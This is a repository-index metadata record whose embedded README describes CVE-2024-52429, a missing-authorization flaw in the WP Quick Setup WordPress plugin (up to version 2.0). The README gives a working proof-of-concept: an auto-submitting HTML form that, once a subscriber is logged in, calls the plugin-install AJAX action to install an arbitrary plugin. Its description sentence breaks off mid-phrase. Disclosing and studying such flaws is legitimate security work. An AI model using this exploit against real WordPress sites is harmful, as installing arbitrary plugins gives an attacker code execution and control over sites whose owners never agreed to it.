{"id":22874288,"url":"https://github.com/randomrobbiebf/cve-2024-52429","last_synced_at":"2026-01-07T23:48:50.293Z","repository":{"id":264161235,"uuid":"892550666","full_name":"RandomRobbieBF/CVE-2024-52429","owner":"RandomRobbieBF","description":"WP Quick Setup \u003c= 2.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin/Theme Installation","archived":false,"fork":false,"pushed_at":"2024-11-22T10:28:33.000Z","size":2,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-02-06T18:52:10.294Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RandomRobbieBF.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-11-22T10:26:55.000Z","updated_at":"2024-11-27T09:45:27.000Z","dependencies_parsed_at":"2024-11-22T11:36:21.937Z","dependency_job_id":null,"html_url":"https://github.com/RandomRobbieBF/CVE-2024-52429","commit_stats":null,"previous_names":["randomrobbiebf/cve-2024-52429"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-52429","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-52429/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-52429/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-52429
/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RandomRobbieBF","download_url":"https://codeload.github.com/RandomRobbieBF/CVE-2024-52429/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246472580,"owners_count":20783225,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-12-13T14:34:38.373Z","updated_at":"2026-01-07T23:48:50.262Z","avatar_url":"https://github.com/RandomRobbieBF.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2024-52429\nWP Quick Setup \u0026lt;= 2.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin/Theme Installation\n\n# Description: \n\nThe WP Quick Setup plugin for WordPress is vulnerable to unauthorized plugin and theme installation due to a missing capability check on a function in all versions up to, and including, 2.0. 
This makes it \n\n```\nType: plugin\nCVSS Score: 8.8\nCVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\nCVE: CVE-2024-52429\n```\n\nPOC\n---\n\nLog in as a subscriber, then run this HTML\n\n```\n\u003chtml\u003e\n  \u003cbody\u003e\n    \u003cform action=\"https://wp-dev.ddev.site/wp-admin/admin-ajax.php\" method=\"POST\"\u003e\n      \u003cinput type=\"hidden\" name=\"action\" value=\"wes\u0026#95;install\u0026#95;plugins\" /\u003e\n      \u003cinput type=\"hidden\" name=\"plugin\u0026#95;urls\u0026#91;\u0026#93;\" value=\"https\u0026#58;\u0026#47;\u0026#47;downloads\u0026#46;wordpress\u0026#46;org\u0026#47;plugin\u0026#47;wdes\u0026#45;responsive\u0026#45;mobile\u0026#45;menu\u0026#46;zip\" /\u003e\n      \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n    \u003c/form\u003e\n    \u003cscript\u003e\n      history.pushState('', '', '/');\n      document.forms[0].submit();\n    \u003c/script\u003e\n  \u003c/body\u003e\n\u003c/html\u003e\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2024-52429","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frandomrobbiebf%2Fcve-2024-52429","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2024-52429/lists"}